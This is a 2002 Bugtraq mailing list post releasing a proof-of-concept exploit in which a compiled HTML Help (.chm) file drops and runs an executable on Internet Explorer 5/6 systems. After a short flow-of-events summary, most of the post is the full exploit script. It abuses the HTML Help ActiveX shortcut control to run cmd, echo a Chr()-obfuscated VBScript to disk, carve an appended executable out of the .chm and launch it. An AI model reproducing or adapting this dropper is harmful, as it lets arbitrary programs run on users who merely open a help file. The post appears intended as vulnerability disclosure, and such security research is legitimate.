Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Re: HELP ! : Trojanised HTML: Internet Exporer 5 and 6 [technical exercise]

From: dzzie () yahoo com
Date: Fri, 8 Feb 2002 04:38:47 -0600


technical note: the possibility is excellent to repeat the entire 
process above directly inside the *.chm file and drop an *.exe from 
within the *.chm into the same Temporary Internet File. Using our 
Guninski scripting to determine the location of the *.chm and write 
that to the link parameter within it: value="'+path+'\\malware
[1].exe"> and execute it.



I made a proof of concept on a chm exe dropper a while back,
I guess nows a good enough time as any to release it...that 
command execution thing in a chm is really dangerous. A chm
is about the same as running an exe right now.

note this works from Internet Temp files directory as well, all 
someone has to do is choose the open option when they click a link
to a chm file, and they are done. 

I am not going to distribute a prepackaged example, no good could 
come of that.below is the html script that is capable of it. It is 
a sufficient enough process to assemble the package as to keep it 
out of the hands of the kids. 

I will email MS with a link to a working sample for them to examine.

also rember the mechanism for this exploit was exposed about a year
ago(?) so I am sure other things have been done with this and it is
still a viable hole.

-------------------------------------------------
flow of events
-------------------------------------------------

1) chm opens 
     a) determines absolute path current folder
     b) determines parent chm name (in case cached changes name)
     c) detects winNT or win98 to work on both

2) chm name is used to auto generate vbs script data
   abs path is used to auto generate html object data
   script writes dynamically generated content to window

3) first object activated programatically....vbs script is echoed 
   into existance into same folder as parent chm file

4) waits 1sec then activates echoed.vbs file...this vbs file
   reads the parent .chm and extracts a hello world exe that is
   appended onto the chm file. 

5) after exe is written to disk vbs script then activates it 

-------------------------------------------------------------
script below
-------------------------------------------------------------


msg='<center><h1> Holy Mackeral Batman !<br><br> I think he hath done it! <br><br> : )\\</h1></center>'

function getChmAbsPath(){
     t=unescape(location.href)
     return t.substring(t.indexOf(":",4)+1,t.lastIndexOf("\\")+1)
}

function getChmName(){
        l=unescape(location.href)
        chmName=l.substring(l.lastIndexOf("\\")+1,l.lastIndexOf(":")-1)
        t='Chr(92)+'
        for(i=0;i<chmName.length;i++){
            t+= 'Chr(' + chmName.charCodeAt(i) + ')+'
        }
        return t.substring(0,t.length-1);
}

function getInterpreter(){      
    if(navigator.userAgent.indexOf('NT') > 0){
       return 'cmd';
    }else{
       return 'command';
    } 
}

vbs='fso=Chr(83)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(105)+Chr(110)+Chr(103)+Chr(46)+Chr(70)+Chr(105)+Chr(108)+Chr(101)+Chr(83)+Chr(121)+Chr(115)+Chr(116)+Chr(101)+Chr(109)+Chr(111)+Chr(98)+Chr(106)+Chr(101)+Chr(99)+Chr(116):'+
    
'wsc=Chr(119)+Chr(115)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(46)+Chr(115)+Chr(104)+Chr(101)+Chr(108)+Chr(108):'+
    'exename=Chr(92)+Chr(101)+Chr(120)+Chr(116)+Chr(114)+Chr(97)+Chr(99)+Chr(116)+Chr(46)+Chr(101)+Chr(120)+Chr(101):'+
    'set i=createobject(fso):'+
    'set o=createobject(fso):'+
    'set w=createobject(wsc):'+
    'pf=i.GetParentFolderName(WSCript.ScriptFullName):'+
    'infile=pf+' + getChmName() + ':'+
    'outfile=pf+exename:'+
    'OFFSET=XXXXXXX:'+
    'Set ii=i.OpenTextFile(infile):'+
    'Set oo=o.OpenTextFile(outfile,2,True):'+
    'ii.Read OFFSET:'+
    'While Not ii.AtEndOfStream:'+
    'oo.Write Chr(Asc(ii.Read(1))):'+
    'Wend:ii.close:oo.close:'+
    'w.Run chr(34)+outfile+chr(34)'

hit='<OBJECT id=shortcut^ type="application/x-oleobject"  '+
    'classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" '+
    'codebase="hhctrl.ocx\#Version=4,72,8252,0" width=100 '+
    'height=100><PARAM name="Command" value="ShortCut">   '+
    '<PARAM name="Text" value="Text: ">                   '+
    '<PARAM name="Item1" value=\',*\'>                    '+
    '<PARAM name="Item2" value="273,1,1"></OBJECT>        '

scriptPath = getChmAbsPath() + 'echoed.vbs'

cmd=new Array
cmd[1]= getInterpreter() + ',/c echo ' + vbs + ' > "' + scriptPath + '"'
cmd[2]='wscript,"' + scriptPath + '"'

function replace(h,i,c){
        h = h.split('^').join(i).split('*').join(c)
    return h
}

hit1=replace(hit,1,cmd[1])
hit2=replace(hit,2,cmd[2])

document.write(hit1+hit2+msg)
shortcut1.Click()
setTimeout("shortcut2.Click()",1000)



__________________________________________________________________________
http://geocities.com/dzzie
__________________________________________________________________________
Previous By Date Next
Previous By Thread Next

Current thread: